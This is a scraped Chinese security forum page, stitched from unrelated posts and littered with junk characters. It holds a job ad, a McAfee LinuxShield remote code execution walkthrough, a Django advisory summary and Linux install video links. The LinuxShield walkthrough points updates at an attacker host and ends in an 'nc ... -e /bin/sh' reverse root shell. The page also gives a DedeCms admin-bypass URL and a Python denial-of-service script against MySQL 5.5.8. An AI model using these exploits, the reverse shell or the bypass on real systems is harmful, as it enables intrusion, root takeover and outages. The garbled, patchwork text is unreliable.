[人才招聘] [招聘] 启明星辰研发招聘 启明星辰

小妍

站内发信给我就行了。
8 X; T, _; ]" S  P. M
7 Z5 h" x: P/ y

一、研发中心：Linux C软件工程师（若干）

岗位职责：

1.% E5 q1 M# ^0 ?: T  k3 T
安全网关,防火墙,IPS等嵌入式设备软件开发，维护

岗位要求：

1.6 Y4 ~4 m9 t& L8 ]6 i; {1 E
精通C语言编程

2.
& ]6 M* Y' b# T2 h1 K1 o, v  `熟练使用Linux操作系统，精通 Linux下C语言编程

3.$ H$ |( |/ W# p" _" G
精通TCP /IP 等网络协议，熟悉应用层协议，及协议分析

4.
" b( a& `6 K2 y4 T熟悉网络安全协议及路由器、交换机、防火墙等安全设备

5.
: n" S, P; G0 q! s) |! ^熟悉Linux内核及开发

二、研发中心：测试工程师（若干）

岗位职责：

1.; k& x4 h5 x: ~, F) g4 H8 o9 R% y' Y
负责产品的系统测试、集成测试工作

2.  ]  P8 S9 T+ h3 G
负责产品用例的编写，执行、修改

3.% ?# I/ i- T7 n8 h) D' K4 v! }/ N
负责产品性能的测试

4.
6 ]6 i  f  x8 h" |4 `! S负责对外项目的支持和测试工作

岗位要求：

1.
$ U. n1 K% o% R/ t# `  t掌握基本的tcp/ip知识

2.
. Y& Y9 m4 t+ i6 ~+ H: G数通基础好

3.
5 I2 u% V6 E" K8 i7 ]4 T0 g0 I对linux有一定的基础

4.3 e% b+ v! {8 ~, {, E! w
掌握数据库的搭建和使用

5.; c- x; y) ~1 D9 Y
至少熟悉一种编程语言C/Perl/VBS/TCL

6., z0 |; I# |- N* [) n  D* c
熟悉测试用例设计,熟悉系统测试，熟悉压力测试

7.0 T; }! x2 k0 }7 a( M/ I1 n8 g$ _
熟悉防火墙相关原理，对于防火墙的一些功能特性有一定的了解

8.2 v- r$ F+ A8 Q6 k
对网络安全设备在网络中的部署有一定的认识

9.1 z% @7 w' h1 k- x4 V  r$ u
掌握测试工具的使用：Loadrunner、包分析软件、思博伦或IXIA的测试仪

三、研发中心：安全事件工程师（若干）

岗位职责：              

1.0 Z: p( P# a- q
木&马检测服务、WEB漏洞扫描服务的实施

2.
$ F' [& ?5 F, k# N3 G对服务客户的技术支持

3.
3 o, V: ?7 [& _7 J4 W对于网页木&马，WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

4.
) f& h) @0 }1 G- S! z( y对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

5.
) N( R* A0 j5 O1 @. ]; }/ Z对各种攻击手段的研究；TCP/IP协议的研究；逆向工程的研究

奶妈

McAfee LinuxShield 本地/远程代码执行漏洞

---

McAfee LinuxShield remote/local code
  l1 }. m# s' y8 H" s影响版本: McAfee LinuxShield <= 1.5.1
  N) i) c; N2 [2 {远程攻击: Yes
. W: [( v# z" L  N' \  m本地溢出: Yes! p0 L3 W% J" @. a
背景阅读:: v3 I- R* t4 K2 {2 Q  M
===========
6 P: f8 }# w7 H7 q* }$ D5 q
, v: Z4 S2 v! u' U6 O& c* yLinuxShield detects and removes viruses and other potentially unwanted
7 ^; t' m( B1 k7 B% {; Esoftware on Linux-based systems. LinuxShield uses the powerful McAfee, g6 H8 y( ]( X" \, }: E1 b
scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our3 i4 }, a. }/ v$ Q$ O7 s1 Z
anti-virus products.2 ]# [' P0 t8 d+ M) I/ Q" e

3 j& _8 k& |, u) d3 bAlthough a few years ago, the Linux operating system was considered a4 L. I9 C, s$ b/ }
secure environment, it is now seeing more occurrences of software
3 t* u: n, V' H9 C" `4 j0 \specifically written to attack or exploit security weaknesses in
- {9 s4 g8 w- T: L* o& DLinux-based systems. Increasingly, Linux-based systems interact with
7 V1 X: M# e  S5 i6 MWindows-based computers. Although viruses written to attack Windows-
" ?/ T( a4 ?$ f, t% x2 Q; Tbased systems do not directly attack Linux systems, a Linux server* M. G. ^6 ?. @, A" ^4 H2 \
can harbor these viruses, ready to infect any client that connects to
+ T  D# B& Z8 Q% m0 Q! P  F0 yit.
# r; V4 e! N/ p( B  Z4 L8 j. P2 V7 z5 a" {: A
When installed on your Linux systems, LinuxShield provides protection& y0 R/ r( V, Z$ [2 i5 n
against viruses, Trojan horses, and other types of potentially  t( p- y1 Y. V$ l% o& R
unwanted software.
& M0 ?' B8 U7 d! t% w- _! ^9 X, Y! w6 F& z, _" Y2 J
LinuxShield scans files as they are opened and closed! N* t' T3 y  `* w& w9 @% n7 @
?&amp;#65533;&amp;#65533; a technique7 D/ G3 d& b+ q/ |: L, K. N
known as on-access scanning. LinuxShield also incorporates an
/ S% P. y( k0 B  D9 i  Y8 Von-demand scanner that enables you to scan any directory or file in; w5 N6 Z( J# x& K
your host at any time.* R5 ?8 `/ [: c% F) F; A

& e; O) s+ Y* h# kWhen kept up-to-date with the latest virus-definition (DAT) files,3 C- e. R+ W, e  S! c
LinuxShield is an important part of your network security. We! P5 g' W- k2 j+ c
recommend that you set up an anti-virus security policy for your
8 x# M3 K9 Z( n$ _6 Inetwork, incorporating as many protective measures as possible.
  Q, ?4 p! V; O% a: J/ W* m4 v$ T: G4 W  K$ \( L
LinuxShield uses a web-browser interface, and a large number of
, p5 L4 B  }! b& zLinuxShield installations can be centrally controlled by ePolicy% H8 Z" T3 f4 `! R6 m* X% ^
Orchestrator.7 v, `6 b& S- m: \" K& h

7 k$ d, f1 T6 b1 g* t, t(Product description from LinuxShield Product Guide)+ l3 ?$ v- K4 i/ ?, [* j9 [
3 I3 X+ \4 O' v: N# Y

* k% ]- K; n3 M; k" b: n- I
4 N% t1 u/ y+ @Description:& `, G6 \( n. V2 B
============4 h$ d- H7 X' x; o: p' b. c$ R  P
# e4 ?7 T8 n" P; t' z3 f
This vulnerability allows remote attackers to execute arbitrary code/ G: }4 J2 k+ O. `+ B
on vulnerable installations of McAfee LinuxShield. User interaction! Q( V) Y9 |1 t
is not required to exploit this vulnerability but an attacker must
, L5 V  w/ X7 L) L, T5 H% Tbe authenticated.1 E& o# O' T2 ^6 |- A+ R9 P
0 S% }" q& U2 o8 x
The LinuxShield Webinterface communicates with the localy installed
# A) n% \! S) T+ k"nailsd" daemon, which listens on port 65443/tcp, to do
# G* p& o  U8 l, V# p# Tconfiguration2 @! @8 Y$ w( ?# T6 w' _+ H2 \
changes, query the configuration and execute tasks.
. z4 e0 }* L' j& U7 N
- \+ q6 z: D4 DEach user, which can login to the victim box, can also authenticate- [9 u' F, o9 n) C
it self to the "nailsd" and can do configuration changes and' l3 w+ j/ r) `7 p& n0 a
execute
0 M  U& z: j  B% Y( g- w7 i- stasks with root privileges.1 A, X+ c& o; P: T( Q! T. C

8 h4 k  g9 i7 j6 ]! [4 vA direct execution of commands is not possible, but it is possible to
  B# u; h- a# C" ~, \download and execute code through manipulation of the config and
) r1 y, e( S* `execute schedule tasks of the LinuxShield.9 n, b. C4 n. d& n

) m+ y: o- g* u1 X& J! `3 I# v7 _. d) U7 n" o  z4 P: s' Y
walk-through (after the TLS handshake):
" N* o7 I, Q8 C; A/ l5 q+--------------------------------------$ ]9 L! r9 k# D/ J
$ r( c2 I& ?8 o
nailsd > +OK welcome to the NAILS Statistics Service4 Y' p, n2 G" \$ X# m
attacker> auth <user> <pass>  U- K2 D# z& m9 r8 Z
nailsd > +OK successful authentication2 n) y! ]" p3 @7 L" S

6 t' [$ x/ S! h" U! P  p7 L: U# Set the Attacker repository to download our code from a httpd+ F, P9 [3 ?8 ~) F2 r
# (catalog.z)
, r2 J' @+ }- y+ F- ^, C6 R- w#---------------------------------------------------------------0 ~' [$ S4 p. Q# h( n5 I' O
attacker> db set 1 _table=repository status=1 siteList=<?xml version2 o' [9 R, D* z: @+ u
="1.0" encoding="UTF-8"?><ns:SiteLists% R* }) L: e3 D
xmlns:ns="naSiteLi
: A' J; }: R5 D; D2 v: cst" GlobalVersion="20030131003110"1 t# E4 Q( v; @: T# m4 W
LocalVersion="20091209
+ d2 E! c- ~6 v3 h0 F6 P& ~161903" Type="Client"><SiteList* c5 ^* T$ l  M% x* }" n7 P% w
Default="1" Name="SomeGU
# I6 X$ v! ?8 z) tID"><HttpSite Type="repository"
8 g2 H: g2 r- TName="EvilRepo" Order="1
7 |( A4 A" J% `! ?! t/ v1 L# p" Server="<attackerhost>:80"* O/ R' Q2 n8 I* y3 G% k( Q
Enabled="1" Local="1"><Rela) N( u& o2 f& i. g2 ]

8 o1 K; s5 Y' i, FtivePath>nai</RelativePath><UseAuth>0</UseAuth><Use  w+ K" l4 O4 s' W
rName></  K, C- ~9 S2 m( O
UserName><Password% T) E, e3 @6 Q8 ~' U+ ?
Encrypted="0"/></HttpSite></SiteList></! x4 H# N% x$ R7 U& O: Q, A
ns:SiteLists> _cmd=update
# x  ?* ]) n- q9 unailsd > +OK database changes buffered.
0 @! k% S# k; h5 W4 L4 P
/ G% ^, f  N! O6 [  ]# d& P7 k9 k# Execute task to set the attacker repository
0 u1 B5 X) h, J, x#---------------------------------------------------------------- _, U( L- H, [! E% b# O4 g5 i
attacker> task setsitelist
  K9 J( c7 [2 f: _7 C; \nailsd > +OK setting sitelist from CMA.; N5 G2 S9 m: H& K
  l6 n0 L, B$ S5 O: B( P
# Execute the default Update task to download the code& t6 R8 D  ^$ u/ {" O" F  ]
#---------------------------------------------------------------
1 H+ q4 e& k; B, ?$ X* a& C& s  battacker> task nstart LinuxShield Update
9 A. ^$ X- \* `1 G& pnailsd > +OK task LinuxShield Update starting, |% i' D* [6 a9 R- @
. ?2 o2 X+ D3 x) o" o4 ?
# Create a Scan profile, which executes our code. The profiles are
: @& `/ y% w) r3 F2 L5 d( u# not stored in the database.) w7 k9 f/ M' G
# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg
5 o  }/ s# x5 \' m#---------------------------------------------------------------
1 G5 d' b) ~+ H) L; }attacker> sconf ODS_99 begin6 b9 |5 m. D9 T3 H; ?" I( D, _
nailsd > +OK 1260400888
9 A7 b/ u+ d9 c* z- g. `! w" M9 b& ?" M" ^. M! d* c4 H+ w3 I* d
# Set the variable "nailsd.profile.ODS_99.scannerPath" to the
& |+ \7 ^- \' s+ n" Vpath2 s4 r5 i; ]7 k
# where our earlier downloaded catalog.z file is stored.8 c9 S- S& w9 z$ B
# (/opt/McAfee/cma/scratch/update/catalog.z)
6 c3 g. r+ `# ^! j#---------------------------------------------------------------/ y3 w& X0 O( n5 @. ?
attacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=! m) V# [6 y" M2 ~: d
true nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O; X$ E! D0 m. H; Q( |. ?7 w
DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=, n, p4 [4 T+ e/ \/ R$ {
10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
1 W% A# e, G7 J2 w3 k3 M3 Eine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro
2 r0 ]0 E/ b2 U" F. b. tfile.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
+ [' d% t8 l( mir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en# [" K. ~# U$ I, w( d/ x% b# a3 w
ginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd' _1 V% n& R8 h& t8 {$ a
.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu: r( I" ^) V  `
risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru2 p( w" M8 F% Q* ^" j( X
e nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_99$ H& M+ U! `9 G7 Z  ]
.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
7 E2 b( k  L) }+ w9 H7 yle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil: J& |$ r( W* w+ `' B
dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin
, }5 D# U) u2 e0 X) v" be nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr9 `: M" H& t8 j
ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm
; L7 o) x8 i* C  x- S3 ~- Oo=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile# C2 t; X- R7 w3 ~% p2 l
.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t% T/ a* n- X  U. t8 x- b
rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat
5 H6 Q- p% H% Och/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100% N. M8 E% ?( J/ o5 B9 ~
00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.
% E, v7 {$ f2 C# \; d7 C+ qODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil3 ~0 O, l& U, C3 c. k& I
ter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true
/ I# x! g$ n/ p$ f1 [6 d) nnailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr! O& @5 T1 W$ l8 M" Z
ofile.ODS_99.filter.extensions.type=extension nailsd.profil2 _3 s9 z' A6 r7 ]9 L
e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_99
% V7 X- p  v! v.action.Default.secondary=Quarantine nailsd.profile.ODS_99.7 {% u) t# p3 Z6 l
action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
) f' y8 Y# a( h) f3 Lecondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa0 t$ i7 i( w& G2 S
ss nailsd.profile.ODS_99.action.error=Block
0 v6 \+ F7 \# j8 a* Q. lnailsd > +OK configuration changes buffered
) g! X9 @, X+ `8 P2 ?) N- wattacker> sconf ODS_99 commit 1260400888
* u( v. h% {0 T% xnailsd > +OK configuration changes stored: G9 C; B9 m8 S) t/ {4 [4 ~2 r- _

2 g: r# b( i6 w$ h' R( t# Set a scan task with the manipulated profile to execute the code4 y1 B% s' |& V2 h5 V) L: y" |
#---------------------------------------------------------------/ v& S( Q' y& ]9 M
attacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy
& X0 ?  s: V2 Zpe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
! o* U) }* Y3 r. _, Q0 `3 e) Imp;exclude:false timetable=type=unscheduled taskResults=0 i& p( M0 s- X8 D. b) U! B
_lastRun=1260318482 status=Stopped _cmd=insert
  D5 r: k/ ]) G4 e+ |1 o0 v$ rnailsd > +OK database changes buffered  N6 z& h! R3 R$ d
6 b; ]5 O' [4 O8 ~0 U$ ~6 Z
# Execute scan task to execute the code
5 J0 v+ m! L7 n# Q#---------------------------------------------------------------
1 {1 m( J- P7 N6 q" d( Sattacker> task nstart Evil Task
8 p, S: t' Z- F) e9 S- Y3 K. G
% d" |* J! c0 ?5 d3 h0 H- \+-------------------------------------- walk-through EOF
1 I# Z* n# k3 n2 G$ {2 A2 `! {: R+ P! S

! D2 d& L7 n+ ?$ `8 ^& pTo get a reverse root shell place something like this in the catalog.z
9 c8 b" B; t$ z9 ]/ c2 G! d+ q  t4 G$ Z8 a7 |+ o5 Y
--- snip ---9 r+ E+ U% t6 J) o5 [
#!/bin/sh
# H3 [  O3 X+ Y. w1 ?8 b3 ~7 rnc -nv <attacker_host> 4444 -e /bin/sh% c) r* l- Q2 p  ~1 w
--- /snip ---
+ q# |- a9 _, _. C; Y5 q' c' I/ I3 Z+ `2 h' {( f$ q3 H! X" g
+ \2 m" S* |4 U4 ~
3 w2 T, c( S/ Z: ]1 Q8 R- s0 E0 d6 c- B
Proof of Concept :4 v+ \! d  b2 i  ~, L2 [/ H
==================
, E# O; h( ]+ @: f
/ B; ~; L% Z3 l* uhttp://inj3ct0r.com/sploits/11165.tar.gz% V) i3 y8 l$ r( x& [/ ]

# d- E3 J6 I8 R& ^8 n5 i& \" i4 T) I
8 f4 |/ {0 D& T7 w" s. B2 D' C, X
Solution:% v& |* q6 b: d6 T# v3 @. Y9 q
=========
! R$ G5 f; J' @+ B9 d: Z
; d6 a2 b4 B+ S7 EMcAfee Advisory* I( I( U+ ]  C$ ]0 m5 m8 z
+--------------
* u& H, u4 y' g  X* P, J% Mhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007
; T, q- z- \  H- y) i" Y2 ]& p% l/ k  C/ r! G
& n2 L5 G# w5 E+ c% f: s. H- t

- Y+ n! a) \! y, w" G# ^$ tDisclosure Timeline (YYYY/MM/DD):
0 B7 u' C1 ~* w, J3 }=================================) k* b  P; L! R
% r1 y" K9 a/ j; J
2009.12.07: Vulnerability found
4 L- l2 a$ L" P2 Q: s2010.02.03: Asked vendor for a PGP key
' ^; b, H$ H+ k# o- [' T2010.02.05: Vendor sent his PGP key* @1 c2 T  N/ `; _4 ?
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure# [4 h# m( M% F0 A/ V! k9 ?
date (2010.02.18) to Vendor
5 K2 B' J. f% `2010.02.05: Vendor acknowledges the reception of the advisory
4 c; \8 d3 x4 U! m( A2010.02.16: Ask for a status update, because the planned release date is; R3 t# O, f( [) o0 a7 c
2010.02.18.8 K* G7 _$ u4 w2 @$ n/ U8 o
2010.02.16: Vendor response that, they are currently working on a patch
# f. L5 a0 V" v0 B$ {2010.02.17: Changed release date to 2010.02.25.
; r1 I$ |1 w- x. r2010.02.22: Vendor gives a status update, that they are able to release3 T# r" n6 c! j% L7 k' _* g
the patch on 2010.02.25.
: X' H% q" a( e4 b% |, p  {2010.02.24: Ask for a list of affected products and the advisory url.
3 `% ]4 b9 C& j# ]7 Y7 a5 m2010.02.24: Vendor sends the list.
$ X8 z5 M' k8 }+ m2 b2010.03.02: Release of this Advisory
7 `0 [' M: P% e8 l
- J& E+ q8 v4 P3 |& z+ s
+ t  i" X+ r; a# q. f, R+ ?& c% [$ s0 k7 x
3 _" m( ^+ ~; X" q- [5 y
" z' J- h8 B- }, N, r1 E: ~( k
! k6 S) ]$ i, }0 e

  }% w8 L- E8 v# n
4 w0 j7 Z0 W  S+ R3 i8 ~! u5 _  G% ~! |" a4 I! I9 Y

: N2 `- E; {" n) p# }7 c: v0 y7 l( I0 V- Q& V
3 Z# P3 T1 u' e1 Q- E( q
5 G) m  I4 p- C3 i  t
3 u" I* G' k$ U6 p$ f: c

" ]; I2 q/ }/ b, Y+ E; n. K0 }; c* }4 a- ~
$ m. L7 Q, {- Z

  B  Z; @2 v! J( w& H
9 d7 Q( {2 m( F! X, n
$ [& v. H, e/ v9 I& q7 l
5 j+ ?# L7 @/ a& H9 z* }公告：https://www.sitedirsec.com公布最新漏洞，请关注

奶妈

Django开发框架多个安全漏洞

---

发布时间: 2011-09-12

# D) d( B( g' g

影响版本:8 q- |4 c5 G3 `8 C
Django 1.2.5
& l, I9 Q' P, d4 n+ N) U8 LDjango 1.3 beta 1
; b. v$ [4 A: X  m0 cDjango 1.2.4) z% E; j" w) ^
Django 1.2.2
  M* Y- ~0 }7 u5 [Django 1.2

5 X* r0 S/ i2 {, l6 ]& v0 G0 Y0 q2 Z

漏洞描述:

& s6 q3 Z2 w. p: C

Django是一款开放源代码的Web应用框架，由Python写成。
" \( U4 ^1 P3 H. S. {5 k/ BDjango存在多个安全漏洞，允许攻击者获得敏感信息，操作数据，进行缓存毒药攻击或进行拒绝服务攻击。
& S+ Z7 z' b$ t9 g/ B1)当使用缓存后端时django.contrib.sessions中处理会话存在错误，可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。
5 ^4 z0 \( {. w# l9 @2)Django模型系统包括一个字段类型-- URLField --，用于校验提供的值是否为合法URL，如果布尔关键字参数verify_exists为真，会尝试校验提供的URL并解析。默认情况下，底层套接字没有超时设置，攻击者可以利用此漏洞发送特制URL消耗所有服务器内存，造成拒绝服务攻击。7 A/ l/ ~5 r( }4 w% L
3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误，攻击者可以利用此漏洞把重定向应答返回给"file://" URL，可判断服务器上的本地文件是否存在。5 C9 H/ k" }$ ~9 ^; E1 R
4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误，攻击者可以利用此漏洞进行缓存毒药攻击。

" U% r& j$ n- L7 ~% m7 \) E

细节参考:
8 _4 G# U* X! i& u4 T, ^% C+ U9 ohttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
4 X5 h3 e1 T8 o, f* w! `3 }http://secunia.com/advisories/45939/

, d: Z! e0 Z  V

: n- h$ Q4 X+ q. P6 K# P5 J; z5 g4 g6 ]* N! @$ B, D4 H

7 ~5 N& L7 b, ~2 j
% b) M6 w- ]( N% u3 d4 I
% @3 W  e. y7 U/ Z- b; J1 o; o, @) e9 H$ Y2 V+ ~
) ]1 f1 j7 E- w  N' l; ]

+ L3 u, c5 ?0 ?9 E  ^" H# l3 u% o/ r

7 _) J$ f; O# D9 T2 P1 q: o9 `6 O, T! k5 {. E/ c5 ?

, f3 a$ Y  Q: M
9 ?! T+ p5 ~( v6 Z/ q2 j) j8 @, x4 n

$ N: A3 r) _+ M# X0 E0 @" p  f6 l0 K9 A" x$ x8 q

* m8 j" x' M: i; F1 _* x: J, v  C/ K# q  @) V; |1 x, `; h* _

5 T1 [& g4 [) J5 H( s8 Z公告：https://www.sitedirsec.com公布最新漏洞，请关注

若凋零子爵

手把手教你装Linux系统-设置虚拟机工具

---

<P align=center>
" k+ E& j8 X  S) m( s" P& j- Q& h% x
http://www.sitedir.com.cn/video/8.swf[/quote]9 D7 a  v9 a' _" O- w
0 D! y0 W+ D7 q' Z' d

/ B& O3 X5 p8 ]
5 x5 ?' H2 G6 v0 g  d  B
" h& w# E( e' k- D# E% R5 p: f) a' S# B8 Z; j) q
* `) A; x. ]  R% ]+ ]& N, Q: c
$ ]9 e6 ^& r! [" N, M6 \
# w! R; {+ Q/ v8 E6 X$ J0 N# z3 B

2 |. {5 x$ f4 j2 z% C2 n& P7 p- K9 v  k! ?& s. n7 |4 b$ \

+ W2 Y( s3 V/ S5 _3 l( U! Z0 Q2 N9 b. n
+ `: u& H; W1 q, f. w
0 X4 @9 ?: w; w4 H- _5 A3 j  e4 F

1 `' B' M: n3 j; ]$ j% P9 J
! E  _( \8 H% C; H6 v. Y3 E  s- A

4 R" K, _0 a% N7 ]公告：https://www.sitedirsec.com公布最新漏洞，请关注

arja

织梦(DedeCms) v5.6-5.7 越权访问漏洞

---

http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

/ D/ Z; M' ^: a- l  g; u% l

把上面validate=dcug改为当前的验证码，即可直接进入网站后台

1 b' c9 ^9 }) Y/ r

此漏洞的前提是必须得到后台路径才能实现

  T& v$ n6 Z) A: n% A- V

官方临时解决办法：

8 }8 x% ?* ?/ K. e# l; m/ r1 r

找到include/common.inc.php文件，把：

3 g2 d2 U9 ~, o5 l1 ~& X. A: M

    foreach($_REQUEST as $_k=>$_v)& B) F2 x$ t; W* D
    {$ L/ c$ D( {% ]; S( _5 Q& e
        var_dump($_k);/ F6 H4 w7 T. r# N
        if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
- ~& ]) R& I$ z$ c2 L( H! R; c' A3 u        {5 Y7 N3 x( y& x1 t
            exit('Request var not allow!');; G8 {, o7 [5 `$ b& H
        }3 I/ h+ s5 P! N! ~% S1 B
    }

; n; M9 _9 e) ]( d' K! n

换成：

! W; X  v8 R4 @$ w

    //检查和注册外部提交的变量- y3 Q4 t3 c' V1 v$ K; Z8 W8 ^
    function CheckRequest(&amp;$val) {
( N/ N8 X. R8 n3 |# _1 x        if (is_array($val)) {$ f: X% W+ z9 f) H  G* c
            foreach ($val as $_k=>$_v) {9 R2 Y+ s& M0 ~9 S8 N
                CheckRequest($_k);
# I2 b& u* J. e1 T0 V/ z                CheckRequest($val[$_k]);
2 G4 c2 K- p+ O0 T2 S% T* d            }
8 j) ^. t4 D5 F3 T' N! E  n9 N        } else" k! e1 ]* {& t* U3 J1 n# B
        {5 h5 H  I2 K3 \4 z& i' U
            if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )5 C- z: [$ u. {6 J6 P: n
            {5 N& c1 l$ Q, ]) |& S
                exit('Request var not allow!');
3 V% M* r; \$ M9 ~7 b8 m+ N            }
8 q* N7 Q1 U) u9 |# C; L0 c8 U        }: c0 @( w# \. C. W5 `7 x
    }% S$ z' A+ t" o: b2 v+ K
    CheckRequest($_REQUEST);
& H: I8 ?4 K; l1 J$ H

5 F4 b# ?, w1 h  o2 e) Y) M- x0 N! {- G# s; K

( R( _1 g4 j( L. [, [. {# {
8 @% x3 v% j, x3 O8 \) q% ]
3 R8 b6 B& W- Z4 v% \
* U" M) w$ c! _2 |. Z: U% x" e3 h4 l4 p, L

- c! z4 O7 Q" b
  y' R+ T# V- u4 _* Z+ w6 j$ M; T8 ?) g2 z( Z

$ j1 @: K$ U' h- p- r% Z* T4 H4 E8 v* Q' M& N3 T9 m8 f

) s' c. [) P* v% }1 |  E. i
, E" K% {& K8 p8 X8 i# }! G
1 t! V! q9 i- u$ l% Z, C7 c% ~, U. S+ z' N& P
" o# E. P4 h. N2 l  h
' s  E1 R% b* Q+ O! O

* y& J9 s9 m  t& t公告：https://www.sitedirsec.com公布最新漏洞，请关注

二级菜鸟

手把手教你装Linux系统-设置虚拟机

---

6 Y& w& Z- C! e' z
http://www.sitedir.com.cn/video/4.swf" i: A3 u- [3 A, F, i# n
% [9 R8 z+ A4 R! d
' c: N! H& k! ]% `# f' `4 G
$ k5 z  j. p; G! ^2 l4 m9 ]
. z3 j+ }! @, @) e+ v6 h
% B- h0 ]5 \$ T. ^5 {: y  h5 }/ n
4 {3 C' j# ?, Y; j. [# ?/ ~( h
; ^  U9 i; g, q
! N, d; h: {5 q- K3 p

5 k1 G! N8 p# v) k
% U6 f& L8 u1 ~, |  |
/ G1 e9 G' J9 E& p* o" T# j- e# J- O* g- _+ Q% Y' |2 \
+ S. [2 E4 [2 B1 e
5 I! X& f6 F: Z5 J  ?
9 {" m3 C1 Y$ R: j4 b- S

/ B% s6 e3 s; V' @, e
; I/ W' _( W7 U' L/ U
3 }& g2 [2 ?, k公告：https://www.sitedirsec.com公布最新漏洞，请关注

dg86760517

MySQL 5.5.8 远程拒绝服务漏洞

---

import socket, sys
! g) L# b# I" f$ r . ?9 n/ L% I, @9 {3 ]
print "
. |! d/ v9 U- c0 N! z: g". P) g3 Q' S& U" i
print "----------------------------------------------------------------"
  K; c4 [: n) {- rprint "| MySQL 5.5.8 Null Ptr (windows)                                |"1 J# H% t" \, G* w! I# ^8 R: K
print "| Level Smash the Stack                                         |"
; U9 i. X) c9 B* s, I* S+ l; yprint "----------------------------------------------------------------"
4 }  L) B2 c2 rprint "& m' g0 `7 s2 a3 Q; b
"6 M" y+ ?3 ?! Y  l

; L6 ?4 S* A) {, Gbuf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"* U" A% k! p# y* }( }: v' P
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")
5 G( C/ l- i. ?2 B: M 4 a- _7 O4 _7 X; P
buf2=("x11x00x00x00x03set autocommit30")4 [3 P4 F0 Z- T: D; H
, m# F2 h& F1 y# ?# Q
def usage():+ @) Z. C6 |% F! D" x
print "usage : ./mysql.py <victim_ip>"
0 a2 i8 c2 W3 m/ t" [; Rprint "example: ./mysql.py 192.168.1.22"
! v+ @1 o4 Z5 x1 s/ c5 o0 z" I
0 Q7 Z  O4 S5 }) F; R
9 d8 f9 v6 k+ \def main():; Q# \; P3 k# m/ n
if len(sys.argv) != 2:
; g8 l6 S  U! a7 V( Y/ iusage()
. z. ~5 k. R. B, s+ E9 osys.exit()
+ q) h3 X  E0 L1 @% O( V# Xs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)" o: N- d4 j- k7 K( \. N2 {
% M' ?' c% Y! F
HOST = sys.argv[1]
( R' `' r4 v3 m. z/ B3 h: z7 ~PORT = int(3306)& B8 ^: w& D* k
s.connect((HOST,PORT))
& S6 a7 U5 O8 L. u0 }  A& F  ?print "

Connect"
. ~6 I* {8 ]0 q# h- r2 @& Ps.send(buf)
$ o2 a! |! s4 \$ J3 xprint "

Payload 1 sent"% ~( z6 t$ ^! d$ g1 a
s.send(buf2)
$ S6 t  e% y4 H9 Q: }print "

Payload 2 sent( \2 G4 n- W* A# m
", "

Run again to ensure it is down..- \4 w7 i1 ^/ B! ~
"
" b8 X4 O* F' P+ i, bs.close()
# [8 L4 y/ x% ^5 M
2 {2 L$ |' B! [, n2 ?' M; n! eif __name__ == "__main__":
& _5 E+ x. u! d6 o- M9 c: H1 w2 jmain()* D# s+ Q7 ~* c, k( }  o" r: @
( ?: P) C+ b2 p& K
' P; ?, R. H& m: [" s) _) M

% l# G$ }' V! f. s& A
4 x* ~* u- j0 n! |% ]8 Y0 k/ C5 Q* D" J
, n2 g  T, J/ Q0 [3 f) j; Q3 y
* j! P3 U: ?+ D* J$ o' [
7 k+ U" D4 B& F/ g. k6 p$ X
- Q2 z& g& T6 a9 d
8 y9 L7 @: N  `3 N  V
7 R' o5 d$ ?) F8 e% F

4 J1 Z$ G% S: l8 I$ K
" i! z, J& X3 R1 a9 h5 O+ [. P: W& o4 s& B- f

+ a: A' S' O/ C) ^- ?: Q! H3 t1 i/ Y" I8 B* J

  [) z, G2 e8 r# X# X9 s4 W
